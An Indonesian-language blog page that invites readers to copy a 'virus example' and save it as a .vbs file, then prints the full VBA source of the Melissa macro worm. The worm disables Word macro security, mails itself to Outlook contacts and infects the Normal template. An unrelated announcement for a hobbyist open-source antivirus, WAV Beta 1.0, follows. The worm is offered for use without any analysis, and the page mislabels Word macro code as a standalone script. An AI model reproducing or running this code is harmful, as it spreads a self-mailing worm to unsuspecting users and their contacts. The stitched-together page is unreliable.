virus yang dapat dihasilkan dari notepad ini harus berektensi bat,vbs,db,cmd,inf. sekarang saya akan memberikan contoh virus yang berektensi vbs kamu dapat mengcopynya sesukamu, ingat setelah anda mengcopy simpan dengan berekstensi vbs contoh adnan.vbs
ubah terlebih dahulu type file menjadi all file dijendela save as


Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

WAV Beta 1.0

hoho ... ketemu lagih bersama sayah noxy ... (tuben usernamenya sama .. biasanya beda ...)

nah, sekrang saya pengen nunjukkin .... nih bahwa WAV mucul yang baruu loh !!!

anjrit nih awalnya garing amat !!! ---> maap ya sodare2 ....

ya udah langsung deuh ....



apa yang baru :

1. Enkripsi database --> yeyy!!!

Enkripsi databse ini yaa, mirip morphost Antivirus yang meng-Enkrip database nya biar kagak bisa diintip orang, 'kan malu kalo diintipin

2. Fasilitas Karantina yang ajibb

Kalo Fasilitas karantina, ya karantina, kayak karantina biasa ajah ..

dan yang paling saya banggakan adalah :

3. pLugin Manager !!!!

Nah, ini yang paling susah .. kenapa harus pake plugin ? karena antivirus sekarang menurut saya tidak efektif, kenapa ? coba pikir judulnya gede-gede "ANTIVIRUS" tapi isinya Task Manager, Startup Manager, UAC, de el el. Menurut saya embel - embel ini GAK penting bagi sebuah antivirus, dengan nambahin embel-embel ini berarti nambahin memory yang dipakai, size file si Anitivrus sendiri 'kan ? makanya ... nah, cara saya nambahin taskmanager tersebut tanpa mengganggu core antivirusnya, saya pake plugin ...

begitu ...

dan tetep,, WAV Open Source ...

Bisa di download di https://sourceforge.net/projects/wedash/

https://www.virologi.info